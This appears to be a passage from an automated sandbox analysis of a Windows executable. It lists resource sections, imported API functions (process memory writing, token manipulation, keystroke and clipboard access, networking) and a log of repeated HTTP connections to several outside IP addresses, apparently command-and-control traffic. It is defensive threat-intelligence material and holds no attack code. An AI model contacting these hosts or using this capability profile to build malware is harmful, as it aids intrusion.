RT_ICON	0xca480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xca9e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xccf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xce038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xce4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xce4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcea84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcf110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcf5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcfb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xd01f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd0660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd07b8	0x5841a	data			1.000334718311028
RT_GROUP_ICON	0x128bd4	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x128c4c	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x128c60	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x128c74	0x14	data	English	Great Britain	1.25
RT_VERSION	0x128c88	0x10c	data	English	Great Britain	0.5970149253731343
RT_MANIFEST	0x128d94	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 8, 2024 18:14:42.546664000 CEST	49737	80	192.168.2.4	154.215.72.110
Jun 8, 2024 18:14:42.551686049 CEST	80	49737	154.215.72.110	192.168.2.4
Jun 8, 2024 18:14:42.551798105 CEST	49737	80	192.168.2.4	154.215.72.110
Jun 8, 2024 18:14:42.575536966 CEST	49737	80	192.168.2.4	154.215.72.110
Jun 8, 2024 18:14:42.580507994 CEST	80	49737	154.215.72.110	192.168.2.4
Jun 8, 2024 18:14:43.847893953 CEST	80	49737	154.215.72.110	192.168.2.4
Jun 8, 2024 18:14:43.896826029 CEST	49737	80	192.168.2.4	154.215.72.110
Jun 8, 2024 18:14:44.041501999 CEST	80	49737	154.215.72.110	192.168.2.4
Jun 8, 2024 18:14:44.041613102 CEST	49737	80	192.168.2.4	154.215.72.110
Jun 8, 2024 18:14:44.042730093 CEST	49737	80	192.168.2.4	154.215.72.110
Jun 8, 2024 18:14:44.047611952 CEST	80	49737	154.215.72.110	192.168.2.4
Jun 8, 2024 18:14:59.620153904 CEST	49738	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:14:59.625144958 CEST	80	49738	202.172.28.202	192.168.2.4
Jun 8, 2024 18:14:59.625212908 CEST	49738	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:14:59.626684904 CEST	49738	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:14:59.631613016 CEST	80	49738	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:00.910419941 CEST	80	49738	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:00.959336996 CEST	49738	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:01.049956083 CEST	80	49738	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:01.050020933 CEST	49738	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:01.131259918 CEST	49738	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:02.149300098 CEST	49739	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:02.154331923 CEST	80	49739	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:02.154438019 CEST	49739	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:02.155886889 CEST	49739	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:02.160823107 CEST	80	49739	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:03.339610100 CEST	80	49739	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:03.381223917 CEST	49739	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:03.474975109 CEST	80	49739	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:03.475070000 CEST	49739	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:03.664052010 CEST	49739	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:04.680506945 CEST	49740	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:04.685522079 CEST	80	49740	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:04.685635090 CEST	49740	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:04.687427044 CEST	49740	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:04.694250107 CEST	80	49740	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:04.694261074 CEST	80	49740	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:04.694267988 CEST	80	49740	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:04.694276094 CEST	80	49740	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:04.694386005 CEST	80	49740	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:04.694550037 CEST	80	49740	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:04.694560051 CEST	80	49740	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:04.694726944 CEST	80	49740	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:04.694735050 CEST	80	49740	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:05.876883030 CEST	80	49740	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:05.928069115 CEST	49740	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:06.019170046 CEST	80	49740	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:06.019248962 CEST	49740	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:06.193747044 CEST	49740	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:07.213296890 CEST	49741	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:07.218512058 CEST	80	49741	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:07.218655109 CEST	49741	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:07.220196009 CEST	49741	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:07.225138903 CEST	80	49741	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:08.436022043 CEST	80	49741	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:08.436209917 CEST	80	49741	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:08.436271906 CEST	80	49741	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:08.436284065 CEST	49741	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:08.436429977 CEST	49741	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:08.439660072 CEST	49741	80	192.168.2.4	202.172.28.202
Jun 8, 2024 18:15:08.444618940 CEST	80	49741	202.172.28.202	192.168.2.4
Jun 8, 2024 18:15:14.802679062 CEST	49743	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:14.807717085 CEST	80	49743	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:14.807802916 CEST	49743	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:14.809267044 CEST	49743	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:14.814273119 CEST	80	49743	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:16.063460112 CEST	80	49743	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:16.115605116 CEST	49743	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:16.318804979 CEST	49743	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:17.336802006 CEST	49744	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:17.343164921 CEST	80	49744	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:17.343350887 CEST	49744	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:17.344849110 CEST	49744	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:17.350102901 CEST	80	49744	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:18.683131933 CEST	80	49744	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:18.724955082 CEST	49744	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:18.850075960 CEST	49744	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:19.868087053 CEST	49745	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:19.873049021 CEST	80	49745	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:19.873167992 CEST	49745	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:19.878348112 CEST	49745	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:19.883479118 CEST	80	49745	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:19.883512020 CEST	80	49745	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:19.883543015 CEST	80	49745	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:19.883595943 CEST	80	49745	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:19.883644104 CEST	80	49745	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:19.883671999 CEST	80	49745	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:19.883699894 CEST	80	49745	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:19.883727074 CEST	80	49745	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:19.883759022 CEST	80	49745	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:21.344163895 CEST	80	49745	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:21.381318092 CEST	49745	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:22.399419069 CEST	49746	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:22.404710054 CEST	80	49746	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:22.404831886 CEST	49746	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:22.406344891 CEST	49746	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:22.411278963 CEST	80	49746	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:23.691433907 CEST	80	49746	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:23.740783930 CEST	49746	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:23.971571922 CEST	80	49746	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:23.971714020 CEST	49746	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:23.972831964 CEST	49746	80	192.168.2.4	116.50.37.244
Jun 8, 2024 18:15:23.977734089 CEST	80	49746	116.50.37.244	192.168.2.4
Jun 8, 2024 18:15:29.002445936 CEST	49747	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:29.007356882 CEST	80	49747	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:29.007445097 CEST	49747	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:29.008886099 CEST	49747	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:29.013921976 CEST	80	49747	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:30.264281034 CEST	80	49747	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:30.318797112 CEST	49747	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:30.376333952 CEST	80	49747	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:30.376447916 CEST	49747	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:30.522846937 CEST	49747	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:31.540913105 CEST	49748	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:31.546024084 CEST	80	49748	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:31.546247959 CEST	49748	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:31.558270931 CEST	49748	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:31.563263893 CEST	80	49748	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:32.378036976 CEST	80	49748	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:32.428189993 CEST	49748	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:32.490104914 CEST	80	49748	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:32.490291119 CEST	49748	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:33.068867922 CEST	49748	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:34.086903095 CEST	49749	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:34.092026949 CEST	80	49749	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:34.092124939 CEST	49749	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:34.094307899 CEST	49749	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:34.099700928 CEST	80	49749	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:34.099756956 CEST	80	49749	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:34.099786997 CEST	80	49749	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:34.099816084 CEST	80	49749	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:34.099885941 CEST	80	49749	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:34.099935055 CEST	80	49749	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:34.099962950 CEST	80	49749	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:34.099994898 CEST	80	49749	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:34.100022078 CEST	80	49749	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:34.914891958 CEST	80	49749	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:34.959321976 CEST	49749	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:35.027890921 CEST	80	49749	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:35.027954102 CEST	49749	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:35.600208998 CEST	49749	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:36.617923975 CEST	49750	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:36.623121977 CEST	80	49750	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:36.623195887 CEST	49750	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:36.624665022 CEST	49750	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:36.629728079 CEST	80	49750	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:37.438873053 CEST	80	49750	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:37.492590904 CEST	49750	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:37.552654028 CEST	80	49750	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:37.552819014 CEST	49750	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:37.553486109 CEST	49750	80	192.168.2.4	46.30.213.191
Jun 8, 2024 18:15:37.558511019 CEST	80	49750	46.30.213.191	192.168.2.4
Jun 8, 2024 18:15:42.680448055 CEST	49751	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:42.685453892 CEST	80	49751	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:42.685538054 CEST	49751	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:42.687410116 CEST	49751	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:42.692379951 CEST	80	49751	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:43.626303911 CEST	80	49751	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:43.678097963 CEST	49751	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:43.784982920 CEST	80	49751	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:43.788727999 CEST	49751	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:44.193772078 CEST	49751	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:45.212357044 CEST	49752	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:45.218123913 CEST	80	49752	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:45.220747948 CEST	49752	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:45.224600077 CEST	49752	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:45.229629040 CEST	80	49752	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:46.211854935 CEST	80	49752	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:46.256215096 CEST	49752	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:46.367738008 CEST	80	49752	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:46.367799044 CEST	49752	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:46.725183010 CEST	49752	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:47.744601011 CEST	49753	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:47.749654055 CEST	80	49753	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:47.749746084 CEST	49753	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:47.752595901 CEST	49753	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:47.757596970 CEST	80	49753	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:47.757632017 CEST	80	49753	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:47.757667065 CEST	80	49753	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:47.757694006 CEST	80	49753	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:47.757812023 CEST	80	49753	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:47.757826090 CEST	80	49753	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:47.757841110 CEST	80	49753	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:47.757925987 CEST	80	49753	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:47.757942915 CEST	80	49753	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:48.700429916 CEST	80	49753	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:48.740602016 CEST	49753	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:48.858740091 CEST	80	49753	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:48.858797073 CEST	49753	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:49.256587029 CEST	49753	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:50.277832031 CEST	49754	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:50.284056902 CEST	80	49754	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:50.284167051 CEST	49754	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:50.286417961 CEST	49754	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:50.291249037 CEST	80	49754	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:51.334306002 CEST	80	49754	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:51.362605095 CEST	80	49754	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:51.362756968 CEST	49754	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:51.364195108 CEST	49754	80	192.168.2.4	85.159.66.93
Jun 8, 2024 18:15:51.369102001 CEST	80	49754	85.159.66.93	192.168.2.4
Jun 8, 2024 18:15:56.387429953 CEST	49755	80	192.168.2.4	91.195.240.94
